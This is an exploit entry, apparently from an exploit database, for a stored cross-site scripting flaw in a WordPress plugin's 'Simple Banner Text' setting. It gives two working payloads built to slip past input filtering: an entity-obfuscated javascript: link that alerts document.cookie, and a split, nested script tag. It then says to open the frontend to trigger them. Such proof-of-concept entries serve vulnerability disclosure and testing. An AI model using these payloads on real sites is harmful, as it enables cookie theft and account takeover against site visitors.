Share 
## https://sploitus.com/exploit?id=WPEX-ID:3FC7986E-3B38-4E16-9516-2AE00BC7A581
Put the following payloads in the "Simple Banner Text" settings of the plugin:
 <a href="jav&#x09;ascript&colon;alert(document.cookie)">Firefox</a>
 <sc<script>ript>alert(/XSS/)</scr</script>ipt>

Then access the frontend to trigger the XSS